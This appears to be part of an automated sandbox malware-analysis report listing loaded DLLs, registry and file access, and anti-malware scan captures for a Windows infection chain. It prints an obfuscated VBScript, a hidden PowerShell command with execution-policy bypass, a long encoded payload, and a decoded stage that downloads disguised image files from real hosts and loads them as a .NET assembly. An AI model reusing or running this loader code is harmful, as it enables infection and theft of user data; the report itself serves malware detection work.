Source: C:\Windows\System32\certutil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: winsync.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\SyncHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: SyncHost.pdbGCTL source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2363857386.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3367182967.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: SyncHost.pdb source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") entreacto = ("$(@(?(@?@?dig@?@? = '") & golfar & "'" entreacto = entreacto & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" entreacto = entreacto & "[??}@*y??}@*" entreacto = entreacto & "t?*(?" entreacto = entreacto & "m.(@(?(@?@?" entreacto = entreacto & "nv?*(?r" entreacto = entreacto & "t]:" entreacto = entreacto & ":Fr@?@?" entreacto = entreacto & "mba??}@*" entreacto = entreacto & "?*(?64??}@*tring( $(@(?(" entreacto = entreacto & "@?@?d" entreacto = entreacto & "ig@?@?.r?*(?" entreacto = entreacto & "@%*:&la" entreacto = entreacto & "(@(?(?*(?('" entreacto = entreacto & "DgTr?*(?" entreacto = entreacto & "','" entreacto = entreacto & "A" entreacto = entreacto & "') ))" entreacto = entreacto & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" entreacto = Replace(entreacto,"@%*:&","p") entreacto = Replace(entreacto,"(@(?(","c") entreacto = Replace(entreacto,"?*(?","e") entreacto = Replace(entreacto,"@?@?","o") entreacto = Replace(entreacto,"??}@*","s") hypercinesia1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " hypercinesia1 = Replace(hypercinesia1,"(@(?(","c") hypercinesia1 = Replace(hypercinesia1,"??}@*","s") hypercinesia1 = Replace(hypercinesia1,"@?@?","o") hypercinesia1 = Replace(hypercinesia1,"@%*:&","p") hypercinesia = hypercinesia1 & """" & entreacto & """" Cama.Run hypercinesia, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/z0DWX", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false");IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/z0DWX", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false");IRegExp2.Pattern("[^0-9]");IRegExp2.Pattern("[^0-9,]");IWshShell3.ExpandEnvironmentStrings("%LocalAppData%");IFileSystem3.FolderExists("C:\Users\user\AppData\Local\DesktopPic\");IFileSystem3.CreateFolder("C:\Users\user\AppData\Local\DesktopPic\");IWshShell3.RegRead("HKLM\Software\Microsoft\Windows NT\CurrentVersion\CurrentVersion");IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/z0DWX", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false");IRegExp2.Pattern("[^0-9]");IRegExp2.Pattern("

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre5DgTreC8DgTrebwByD

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgB